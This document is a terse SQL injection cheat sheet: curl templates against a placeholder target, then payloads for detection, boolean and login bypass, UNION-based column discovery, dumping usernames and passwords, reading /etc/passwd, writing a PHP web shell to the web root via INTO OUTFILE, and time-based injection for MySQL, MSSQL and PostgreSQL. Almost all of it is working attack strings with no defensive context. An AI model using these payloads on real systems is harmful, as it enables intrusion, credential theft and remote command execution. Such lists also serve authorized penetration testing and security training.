curl "http://target/item.php?id=1<PAYLOAD>"
//Example Time-Based
curl "http://target/item.php?id=1' OR SLEEP(5)-- -"
Basic Injections
#Detection
'
"
`
#Boolean-Based Injection
' OR 1=1--
' OR 1=2--
' OR '1'='1'--
' OR '1'='2'--
' AND 1=1--
' AND 1=2--
#Logic Bypass
admin'--
admin'#
admin' OR '1'='1'--
' OR 1=1--
#Different Databases
-- (space often required)
-- -
#
/*
Union Injections
//Order By → find column count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
//Column reflection → find which column prints
' UNION SELECT 1,2,3--
//Null method → match column count
' UNION SELECT NULL,NULL,NULL--
//Credential / Table dump
' UNION SELECT username,password,NULL FROM users--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
//File Read
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL--
//File Write
' UNION SELECT "<?php system($_GET['cmd']); ?>",NULL,NULL INTO OUTFILE '/var/www/html/shell.php'--
Time Based Injection
#MySQL
' OR SLEEP(5)-- -
#Conditional
' AND IF(1=1,SLEEP(5),0)-- -
#MSSQL
'; WAITFOR DELAY '0:0:5'--
#PostgreSQL
'; SELECT pg_sleep(5)--
Enumeration Injection
//List Database Version
' UNION SELECT @@version,NULL,NULL--
//DB Name
' UNION SELECT database(),NULL,NULL--
//List Tables
' UNION SELECT schema_name,NULL,NULL FROM information_schema.schemata--
//List Columns
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
//Dump
' UNION SELECT username,password,NULL FROM users--